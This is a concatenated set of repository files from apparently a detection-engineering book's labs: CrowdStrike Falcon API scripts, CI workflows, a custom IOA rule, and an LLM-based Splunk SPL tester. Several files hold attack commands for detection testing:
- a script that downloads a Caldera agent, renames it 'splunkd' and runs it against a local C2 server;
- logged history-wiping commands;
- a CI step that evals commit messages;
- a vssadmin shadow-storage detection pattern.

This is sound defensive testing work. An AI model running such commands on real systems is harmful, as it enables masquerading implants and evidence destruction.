https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
8 | def uploadioa(ioc_body):
9 | BODY = ioc_body
10 | response = falcon.command("create_rule",
11 | retrodetects=False,
12 | ignore_warnings=True,
13 | body=BODY
14 | )
15 | #print(response)
16 | return response
17 |
18 | if __name__ == '__main__':
19 | parser = argparse.ArgumentParser(
20 | prog='custom-ioa-cs',
21 | description='Takes JSON formatted payload for a custom IOA',
22 | epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
23 | )
24 | parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
25 | parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
26 | args = parser.parse_args()
27 |
28 | #assign secrets from env variables or arguments from CLI
29 | CLIENT_ID = args.id
30 | CLIENT_SECRET = args.secret
31 |
32 |
33 | #client setup do outside of function so you arent using against call quotas each post
34 | falcon = APIHarnessV2(client_id=CLIENT_ID,
35 | client_secret=CLIENT_SECRET
36 | )
37 |
38 | #construct body read from external file like a real CI
39 | file_handle = open('test-rule-import.json', 'r')
40 | BODY = json.loads(file_handle.read())
41 | #print(type(BODY))
42 | #print(BODY)
43 |
44 | #call function with parameters
45 |
46 | response = uploadioa(BODY)
47 | json_response = json.dumps(response)
48 | print(json_response)
49 |
50 |
51 | exit()
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/detections-example-output-build-ci.txt:
--------------------------------------------------------------------------------
1 | #### Detections Triggered ####
2 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
3 | Tactic ID: TA0011
4 | Display Name: CurlWgetMalwareDownload
5 | Severity: 70
6 | Confidence: 80
7 | #### Detections Triggered ####
8 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
9 | Tactic ID: TA0011
10 | Display Name: CurlWgetMalwareDownload
11 | Severity: 70
12 | Confidence: 80
13 | #### Detections Triggered ####
14 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
15 | Tactic ID: TA0011
16 | Display Name: CurlWgetMalwareDownload
17 | Severity: 70
18 | Confidence: 80
19 | #### Detections Triggered ####
20 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
21 | Tactic ID: TA0011
22 | Display Name: CurlWgetMalwareDownload
23 | Severity: 70
24 | Confidence: 80
25 | #### Detections Triggered ####
26 | Cmdline: ./splunkd -server http://0.0.0.0:8888 -group red -v
27 | Tactic ID: TA0005
28 | Display Name: SystemBinaryMasqeradingLin
29 | Severity: 70
30 | Confidence: 80
31 | #### Detections Triggered ####
32 | Cmdline: sh -c > $HOME/.bash_history && unset HISTFILE
33 | Tactic ID: CSTA0001
34 | Display Name: GenPostExploitLinSession
35 | Severity: 70
36 | Confidence: 80
37 | #### Detections Triggered ####
38 | Cmdline: sh -c > $HOME/.bash_history && unset HISTFILE
39 | Tactic ID: TA0002
40 | Display Name: GenDefenseEvasionLinSession
41 | Severity: 70
42 | Confidence: 80
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/falcon-detection-testing.yml:
--------------------------------------------------------------------------------
1 | # This is a basic workflow to help you get started with Actions
2 |
3 | name: Use Case Tests for CS Falcon EDR Detections
4 |
5 | # Controls when the workflow will run
6 | on:
7 | push:
8 | branches: [ "main" ]
9 | paths:
10 | - usecase-tests/*
11 | # - ioa-rules/*
12 | pull_request:
13 | branches: [ "main" ]
14 |
15 | # Allows you to run this workflow manually from the Actions tab
16 | workflow_dispatch:
17 |
18 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
19 | env:
20 | test_payload: ${{ github.event.head_commit.message }}
21 | CS_CLIENT_ID: ${{ secrets.CS_CLIENT_ID }}
22 | CS_CLIENT_SECRET: ${{ secrets.CS_CLIENT_SECRET }}
23 |
24 | permissions:
25 | contents: read # This is required for actions/checkout
26 |
27 | jobs:
28 | DetectionTestTrigger:
29 | # The type of runner that the job will run on
30 | runs-on: [self-hosted, linux, dc-ubuntu] #based on logical combination of labels
31 | steps:
32 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
33 | - uses: actions/checkout@v4
34 |
35 | #deploy python and cache requirements
36 | - name: Setup Python Packages
37 | uses: actions/setup-python@v5
38 | with:
39 | python-version: '3.10'
40 | cache: 'pip'
41 | - run: pip install -r ./requirements.txt
42 |
43 | # Runs a single command using the runners shell
44 | - name: Execute Payload from Commit Message
45 | continue-on-error: true #doesnt gurantee trigger just bash not exiting on a non 0 condition
46 | run: eval $test_payload
47 |
48 | # Wait for Trigger and Run Test Scripts
49 | - name: Wait for Detections in CS Falcon
50 | run: sleep 30 #use what makes sense
51 |
52 | - name: Run Tests
53 | run: |
54 | python ./usecase-tests/test-detections-host-cs.py #hard coded the our testing machine you can refactor later
55 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/get-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from falconpy import APIHarnessV2
4 |
5 | CLIENT_ID = os.getenv('CS_CLIENT_ID')
6 | CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')
7 |
8 | # Do not hardcode API credentials!
9 | falcon = APIHarnessV2(client_id=CLIENT_ID,
10 | client_secret=CLIENT_SECRET
11 | )
12 |
13 | BODY = {
14 | "ids": ["1"]
15 | }
16 |
17 | response = falcon.command("get_rules_get", body=BODY)
18 | #print(type(response))
19 | json_response = json.dumps(response)
20 | print(json_response)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/linter-custom-ioa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import jsonschema, json
3 |
4 | #raw openapi spec
5 | #https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json
6 |
7 | #2023-dec-28 us-2 falcon
8 | custom_ioa_schema = {
9 | "comment": "string",
10 | "description": "string",
11 | "disposition_id": 0,
12 | "field_values": [
13 | {
14 | "final_value": "string",
15 | "label": "string",
16 | "name": "string",
17 | "type": "string",
18 | "value": "string",
19 | "values": [
20 | {
21 | "label": "string",
22 | "value": "string"
23 | }
24 | ]
25 | }
26 | ],
27 | "name": "string",
28 | "pattern_severity": "string",
29 | "rulegroup_id": "string",
30 | "ruletype_id": "string"
31 | }
32 |
33 | try:
34 | #imported sample use case
35 | file_handle = open('test-rule-import.json', 'r')
36 |
37 | use_case_payload = json.load(file_handle)
38 |
39 | results = jsonschema.validate(instance=use_case_payload,
40 | schema=custom_ioa_schema)
41 | #print(results)
42 | if 'None' in str(results):
43 | print('Custom use case payload VALIDATED')
44 | elif str(results) != 'None':
45 | print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023.' +
46 | 'See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
47 | exit(1)
48 | except:
49 | exit(1)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/requirements.txt:
--------------------------------------------------------------------------------
1 | attrs==23.2.0
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.5
5 | docutils==0.20.1
6 | idna==3.6
7 | jsonschema==4.20.0
8 | jsonschema-specifications==2023.12.1
9 | referencing==0.32.0
10 | requests==2.31.0
11 | rpds-py==0.16.2
12 | statistics==1.0.3.5
13 | urllib3==2.1.0
14 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/test-detections-host-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json, statistics
3 | from datetime import datetime, timedelta
4 | from falconpy import APIHarnessV2
5 |
6 | #secrets must be injected at test time from the CI runner
7 | CS_CLIENT_ID = os.environ.get('CS_CLIENT_ID')
8 | CS_CLIENT_SECRET = os.environ.get('CS_CLIENT_SECRET')
9 |
10 |
11 | def getDetections(tested_host_name, num_hours_lookback):
12 | #type cast the user input
13 | host_name = str(tested_host_name)
14 | num_hours = int(num_hours_lookback)
15 |
16 | #construct the API client
17 | falcon = APIHarnessV2(client_id=CS_CLIENT_ID, client_secret=CS_CLIENT_SECRET)
18 |
19 | #strtime fmt requirement lookback for cs timestamps
20 | current_time = datetime.now()
21 | last_hrs = current_time - timedelta(hours=num_hours)
22 | lookup_time = last_hrs.strftime("%Y-%m-%dT%H:%M:%SZ")
23 | #print(lookup_time)
24 |
25 | filter_query = f"last_behavior:<='{lookup_time}', device.hostname:'{host_name}'"
26 | #filter_query = f"device.hostname:'{host_name}'"
27 |
28 | response = falcon.command("QueryDetects",
29 | offset=0,
30 | limit=50,
31 | sort="last_behavior|desc",
32 | filter=filter_query
33 | )
34 |
35 | #print(type(response))
36 | detectid_values_list = response['body']['resources']
37 |
38 | BODY = {
39 | "ids": detectid_values_list
40 | }
41 |
42 | response = falcon.command("GetDetectSummaries", body=BODY)
43 | #returned json sometimes has non complianct chars need to scrub them
44 | response = json.dumps(response) #converts to string
45 | response = json.loads(response) #converts back to json compatible dictionary
46 | #print(type(response))
47 |
48 | #aggregate multiple detections where applicable
49 | cmdline_list = []
50 | tactic_id_list = []
51 | display_name_list = []
52 | severity_list = []
53 | confidence_list = []
54 |
55 | if response['status_code'] in range(200,299): #in case they add 2XX additional states in future
56 | for resource in response['body']['resources']:
57 | for behavior in resource['behaviors']:
58 | cmdline = behavior['cmdline']
59 | tactic_id = behavior['tactic_id']
60 | display_name = behavior['display_name']
61 | severity = behavior['severity'] # integer
62 | confidence = behavior['confidence'] # integer
63 | #add to respective lists for return later
64 | cmdline_list.append(cmdline)
65 | tactic_id_list.append(tactic_id)
66 | display_name_list.append(display_name)
67 | severity_list.append(severity)
68 | confidence_list.append(confidence)
69 | #return cmdline, tactic_id, display_name, severity, confidence #use for first or single detections
70 | return cmdline_list, tactic_id_list, display_name_list, severity_list, confidence_list #returns position tuples
71 |
72 | #driver main
73 | if __name__ == '__main__':
74 | #for the lab we are running the self hosted runner on the same 'test' host
75 | #in prod you should separate these and execute via ssh keys remotely
76 | ### TEST PARAMETER SPECIFICS ###
77 | host_name = "dc-ubuntu"
78 | results = getDetections(host_name, 4)
79 |
80 | ### TEST CRITERIA ###
81 | #print if you want to debug exceptions in the CI logs easier
82 | print(results)
83 |
84 | #example if your overrall detections are based on ML or fuzzy you can use averages pending EDR
85 | if statistics.mean(results[4]) >=80:
86 | print('EDR confidence score disposition ok')
87 | if 'CurlWgetMalwareDownload' in results[2]:
88 | print('end-to-end test successful')
89 | else:
90 | print('test did not meet requirement spec')
91 | exit(1)
92 |
93 | #setting job on eval to continue on error try other lolbins
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-06/lab-6.4/start-caledera.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/bash
2 | cd /home/dc/Downloads/caldera
3 | python3 server.py --insecure &
4 | sleep 10
5 | #use default sandcat agent
6 | server="http://0.0.0.0:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v &
7 |
--------------------------------------------------------------------------------
/chapter-06/optional-resources/bas-tools/safebreach-get-test-results.py:
--------------------------------------------------------------------------------
1 | import http.client
2 | conn = http.client.HTTPSConnection("url")
3 |
4 | ### Run an existing simulation plan you made in console ###
5 | headers = {
6 | 'accept': "application/json",
7 | 'x-apitoken': "REPLACE_KEY_VALUE"
8 | }
9 |
10 | conn.request("POST", "/api/orch/v2/accounts/%7Baccount_id%7D/queue", headers=headers)
11 |
12 | res = conn.getresponse()
13 | data = res.read()
14 |
15 | print(data.decode("utf-8"))
16 |
17 | ### add logic here to retry and wait for specific amounts of time until a response returns 2XX ###
18 |
19 | ### Get Test Results Summaries to Parse ###
20 | conn.request("GET", "/api/data/v1/accounts/%7Baccount_id%7D/testsummaries/%7BtestId%7D", headers=headers)
21 | res = conn.getresponse()
22 | data = res.read()
23 |
24 | print(data.decode("utf-8"))
25 |
26 |
27 | ### add logic here parse the results and ensure the detections fired exit with error or exit clean when part of CI ###
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/ai-unit-testing-prompt-claude2.txt:
--------------------------------------------------------------------------------
1 | - name: Run LLM Engine 1
2 | run: |
3 | python ./llm-engine-1-test-increment-var.py
4 | - name: Run LLM Engine 2
5 | run: |
6 | python ./llm-engine-2-test-increment-var.py
7 | - name: Calculate Min Score Vote
8 | run: |
9 | if [[ $SUM_SCORE -le 5 ]]; then echo "FAIL: Threshold Not Met" && exit 1; fi
10 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/bot-kb/links-to-pdfs.md:
--------------------------------------------------------------------------------
1 | ## Download the following PDFs and upload them to your poe.com bot as a knowledge base
2 | - https://www.splunk.com/en_us/form/the-network-defenders-compendium.html
3 | - https://www.splunk.com/pdfs/exploring-splunk.pdf
4 | - https://conf.splunk.com/files/2016/slides/power-of-spl.pdf
5 | - https://conf.splunk.com/files/2017/slides/power-of-spl.pdf
6 | - https://conf.splunk.com/files/2017/slides/the-art-of-detection-using-splunk-enterprise-security.pdf
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/buildspec.csv:
--------------------------------------------------------------------------------
1 | ./logs/aws-iam-access-key-creation.log,./detections/aws-iam-access-key-creation.spl
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/ci-spl-tester-poe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse, warnings, csv
3 | import fastapi_poe as fp
4 |
5 | api_key = os.getenv('POE_API')
6 |
7 | #need to use async because bot will have multi-line outputs that need to complete
8 | #https://developer.poe.com/server-bots/accessing-other-bots-on-poe
9 | async def get_responses(api_key, messages):
10 | response = ""
11 | async for partial in fp.get_bot_response(messages=messages,
12 | #bot_name="",
13 | bot_name="Claude-2-100k",
14 | #bot_name="Claude-Instant",
15 | api_key=api_key,
16 | temperature=0.15):
17 | if isinstance(partial, fp.PartialResponse) and partial.text:
18 | response += partial.text
19 |
20 | return response
21 |
22 | #parse buildspec file
23 | buildspec_handle = open('buildspec.csv', 'r')
24 | buildspec_file = csv.reader(buildspec_handle, delimiter=',')
25 | for i in buildspec_file: #csv.reader requires iteration
26 | log_path = str(i[0]) #get first column
27 | spl_path = str(i[1]) #get second column
28 |
29 | #forgot about overloads :)
30 | log_file = open(log_path, 'r').read()
31 | spl_file = open(spl_path, 'r').read()
32 | prompt_file = open('prompt.md', 'r').read()
33 |
34 | #construct the prompt without fstrings
35 | prompt_text = prompt_file + '\n ## Sample Log \n' + log_file + '\n ## Correlation Search SPL \n' + spl_file
36 | #print(prompt_text)
37 |
38 | message = fp.ProtocolMessage(role="user", content=(prompt_text))
39 |
40 | #main driver
41 | if __name__ == "__main__":
42 | #event loop response
43 | bot_response = asyncio.run(get_responses(api_key, [message]))
44 | print(bot_response)
45 | if '[HIGH]' in bot_response:
46 | print('PASS: AI Evaluation - HIGH')
47 | exit()
48 | elif '[MEDIUM]' in bot_response:
49 | print('CAUTION: AI Evaluation - MEDIUM')
50 | warnings.warn('CAUTION: AI Evaluation - MEDIUM')
51 | elif '[LOW]' in bot_response:
52 | print('FAIL: AI Evaluation - LOW')
53 | raise ValueError('TEST FAIL: AI Low probability Rating. Please check test log and SPL.')
54 | exit(1)
55 | elif '[UNKNOWN]' in bot_response:
56 | print('FAIL: AI Evaluation - UNKNOWN')
57 | raise ValueError('TEST FAIL: AI cannot determine detection. Please check test log and SPL.')
58 | exit(1)
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/detections/aws-iam-access-key-creation.spl:
--------------------------------------------------------------------------------
1 | `cloudtrail` eventName = CreateAccessKey userAgent !=console.amazonaws.com errorCode = success
2 | | eval match=if(match(userIdentity.userName,requestParameters.userName),1,0)
3 | | search match=0
4 | | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn
5 | | `security_content_ctime(firstTime)`
6 | | `security_content_ctime(lastTime)`
7 | |`aws_createaccesskey_filter`
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/local-spl-tester-poe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse, warnings
3 | import fastapi_poe as fp
4 |
5 | api_key = os.getenv('POE_API')
6 |
7 | #runtime arguments
8 | parser = argparse.ArgumentParser()
9 | parser.add_argument('-log', type=str, help='/path/to/testlog.log')
10 | parser.add_argument('-spl', type=str, help='/path/to/detection.spl')
11 | args = parser.parse_args()
12 |
13 | if not args.log:
14 | print('Please add -log ')
15 | exit()
16 | if not args.spl:
17 | print('Please add -spl ')
18 |
19 | #need to use async because bot will have multi-line outputs that need to complete
20 | #https://developer.poe.com/server-bots/accessing-other-bots-on-poe
21 | async def get_responses(api_key, messages):
22 | response = ""
23 | async for partial in fp.get_bot_response(messages=messages,
24 | #bot_name="",
25 | #bot_name="Claude-2-100k",
26 | bot_name="Claude-Instant",
27 | api_key=api_key,
28 | temperature=0.15):
29 | if isinstance(partial, fp.PartialResponse) and partial.text:
30 | response += partial.text
31 |
32 | return response
33 |
34 | #pull details from files and construct message
35 | log_path = args.log
36 | spl_path = args.spl
37 |
38 | #forgot about overloads :)
39 | log_file = open(log_path, 'r').read()
40 | spl_file = open(spl_path, 'r').read()
41 | prompt_file = open('prompt.md', 'r').read()
42 |
43 | #construct the prompt without fstrings
44 | prompt_text = prompt_file + '\n ## Sample Log \n' + log_file + '\n ## Correlation Search SPL \n' + spl_file
45 | #print(prompt_text)
46 |
47 | #good practice
48 | log_file.close()
49 | spl_file.close()
50 | prompt_file.close()
51 |
52 | message = fp.ProtocolMessage(role="user", content=(prompt_text))
53 |
54 | #main driver
55 | if __name__ == "__main__":
56 | #event loop response
57 | bot_response = asyncio.run(get_responses(api_key, [message]))
58 | print(bot_response)
59 | if '[HIGH]' in bot_response:
60 | print('PASS: AI Evaluation - HIGH')
61 | exit()
62 | elif '[MEDIUM]' in bot_response:
63 | print('CAUTION: AI Evaluation - MEDIUM')
64 | warnings.warn('CAUTION: AI Evaluation - MEDIUM')
65 | elif '[LOW]' in bot_response:
66 | print('FAIL: AI Evaluation - LOW')
67 | raise ValueError('TEST FAIL: AI Low probability Rating. Please check test log and SPL.')
68 | exit(1)
69 | elif '[UNKNOWN]' in bot_response:
70 | print('FAIL: AI Evaluation - UNKNOWN')
71 | raise ValueError('TEST FAIL: AI cannot determine detection. Please check test log and SPL.')
72 | exit(1)
73 |
74 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/logs/aws-iam-access-key-creation.log:
--------------------------------------------------------------------------------
1 | {
2 | "eventVersion": "1.09",
3 | "userIdentity": {
4 | "type": "AssumedRole",
5 | "principalId": "AYMPTTZB7KOAMAJXYAORA:GitHub_to_AWS_via_FederatedOIDC",
6 | "arn": "arn:aws:sts::112233445566:assumed-role/GithubOIDC-Actions-Role-WdBZFIFGsMUs/GitHub_to_AWS_via_FederatedOIDC",
7 | "accountId": "112233445566",
8 | "accessKeyId": "ASIAYXJAMAOK345GLT6U",
9 | "sessionContext": {
10 | "sessionIssuer": {
11 | "type": "Role",
12 | "principalId": "AYMPTTZB7KOAMAJXYAORA",
13 | "arn": "arn:aws:iam::112233445566:role/GithubOIDC-Actions-Role-WdBZFIFGsMUs",
14 | "accountId": "112233445566",
15 | "userName": "GithubOIDC-Actions-Role-WdBZFIFGsMUs"
16 | },
17 | "webIdFederationData": {
18 | "federatedProvider": "arn:aws:iam::112233445566:oidc-provider/token.actions.githubusercontent.com",
19 | "attributes": {}
20 | },
21 | "attributes": {
22 | "creationDate": "2024-01-17T23:41:35Z",
23 | "mfaAuthenticated": "false"
24 | }
25 | }
26 | },
27 | "eventTime": "2024-01-17T23:42:03Z",
28 | "eventSource": "iam.amazonaws.com",
29 | "eventName": "CreateAccessKey",
30 | "awsRegion": "us-east-1",
31 | "sourceIPAddress": "40.84.170.239",
32 | "userAgent": "Boto3/1.34.21 md/Botocore#1.34.21 ua/2.0 os/linux#6.2.0-1018-azure md/arch#x86_64 lang/python#3.10.13 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.21",
33 | "requestParameters": {
34 | "userName": "someUser"
35 | },
36 | "responseElements": {
37 | "accessKey": {
38 | "userName": "someUser",
39 | "accessKeyId": "AKIAYXJAMAOKVPGE4AX7",
40 | "status": "Active",
41 | "createDate": "Jan 17, 2024 11:42:03 PM"
42 | }
43 | },
44 | "requestID": "798a9942-cc13-4c10-bfe3-1dd196e9c468",
45 | "eventID": "1e1a9eb4-3c2a-4f4d-83b2-704216ac71ff",
46 | "readOnly": false,
47 | "eventType": "AwsApiCall",
48 | "managementEvent": true,
49 | "recipientAccountId": "112233445566",
50 | "eventCategory": "Management",
51 | "tlsDetails": {
52 | "tlsVersion": "TLSv1.2",
53 | "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
54 | "clientProvidedHostHeader": "iam.amazonaws.com"
55 | }
56 | }
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/prompt.md:
--------------------------------------------------------------------------------
1 | ## Context
2 | - You are a Splunk Cloud Enterprise Security detection engineer bot that analyzes Splunk SPL correlation searches and evaluates against the reference guide and a given log payload if the rule would successfully return results: https://docs.splunk.com/Documentation/Splunk/9.1.2/SearchReference/Commandsbycategory.
3 | - You are also a precise engineering bot that does not deviate from the requirements provided.
4 | ## Requirements
5 | - Do not include unnecessary statements in your response, only code.
6 | - Do not include any explanations in your responses.
7 | - Never fabricate or provide untrue details that impact functionality.
8 | - Do not make mistakes. Always validate your response to work.
9 | - Seek example logs and official documentations on the web to use in your validation.
10 | - Search the web for the official vendor logs and note the format, use it in your analysis.
11 | - Mentally emulate validation of the correlation search as if you were a Splunk engine based on synthesized logging that you generate from searching official vendor information on the web.
12 | - Utilize the log sample provided as a known truth that malicious activity is part of the log that we need to detect on.
13 | - Provide a probability of "[LOW]", "[MEDIUM]", or "[HIGH]" if the correlation search SPL would successfully detect in a separate line with nothing else.
14 | - If you do not know the answer if the correlation search SPL would successfully detect, it is ok, just write: "[UNKNOWN]" with nothing else.
15 | - Your answer output should ONLY be "[LOW]", "[MEDIUM]", "[HIGH]", or "[UNKNOWN]". Do NOT output anything else, not even your analysis or thoughts.
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/requirements.txt:
--------------------------------------------------------------------------------
1 | annotated-types==0.6.0
2 | anyio==4.2.0
3 | certifi==2023.11.17
4 | click==8.1.7
5 | fastapi==0.109.1
6 | fastapi_poe==0.0.28
7 | feedparser==6.0.11
8 | h11==0.14.0
9 | httpcore==1.0.2
10 | httpx==0.26.0
11 | httpx-sse==0.4.0
12 | idna==3.6
13 | pydantic==2.5.3
14 | pydantic_core==2.14.6
15 | sgmllib3k==1.0.0
16 | sniffio==1.3.0
17 | sse-starlette==1.8.2
18 | starlette==0.35.1
19 | typing_extensions==4.9.0
20 | uvicorn==0.25.0
21 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/splunk-spl-ai-tester-ci.yml:
--------------------------------------------------------------------------------
1 | name: AI Splunk SPL Synthethic Testing
2 |
3 | # Controls when the workflow will run
4 | on:
5 | push:
6 | branches: [ "main" ]
7 | paths:
8 | - detections/*.spl
9 | pull_request:
10 | branches: [ "main" ]
11 |
12 | # Allows you to run this workflow manually from the Actions tab
13 | workflow_dispatch:
14 |
15 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
16 | env:
17 | POE_API: ${{ secrets.POE_API }}
18 |
19 | permissions:
20 | contents: read # This is required for actions/checkout
21 |
22 | jobs:
23 | DetectionTestTrigger:
24 | # The type of runner that the job will run on
25 | runs-on: ubuntu-latest #based on logical combination of labels
26 | steps:
27 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
28 | - uses: actions/checkout@v4
29 |
30 | #deploy python and cache requirements
31 | - name: Setup Python Packages
32 | uses: actions/setup-python@v5
33 | with:
34 | python-version: '3.10'
35 | cache: 'pip'
36 | - run: pip install -r ./requirements.txt
37 | #run AI tests assumes buildspec.csv is in root
38 | - name: Run Tests
39 | run: |
40 | python ./ci-spl-tester-poe.py
--------------------------------------------------------------------------------
/chapter-07/lab-7.2/linter-custom-ioa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import jsonschema, json
3 |
4 | #raw openapi spec
5 | #https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json
6 |
7 | #2023-dec-28 us-2 falcon
8 | custom_ioa_schema = {
9 | "comment": "string",
10 | "description": "string",
11 | "disposition_id": 0,
12 | "field_values": [
13 | {
14 | "final_value": "string",
15 | "label": "string",
16 | "name": "string",
17 | "type": "string",
18 | "value": "string",
19 | "values": [
20 | {
21 | "label": "string",
22 | "value": "string"
23 | }
24 | ]
25 | }
26 | ],
27 | "name": "string",
28 | "pattern_severity": "string",
29 | "rulegroup_id": "string",
30 | "ruletype_id": "string"
31 | }
32 |
33 | try:
34 | #imported sample use case
35 | file_handle = open('test-rule-import.json', 'r')
36 |
37 | use_case_payload = json.load(file_handle)
38 |
39 | results = jsonschema.validate(instance=use_case_payload,
40 | schema=custom_ioa_schema)
41 | #print(results)
42 | if 'None' in str(results):
43 | print('Custom use case payload VALIDATED')
44 | elif str(results) != 'None':
45 | print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023.' +
46 | 'See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
47 | exit(1)
48 | except:
49 | exit(1)
--------------------------------------------------------------------------------
/chapter-08/lab-8.1/Data Ingestion and Health 2024-01-25T1419.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-08/lab-8.1/Data Ingestion and Health 2024-01-25T1419.pdf
--------------------------------------------------------------------------------
/chapter-08/lab-8.1/Rule Detections 2024-01-25T1416.pdf:
--------------------------------------------------------------------------------
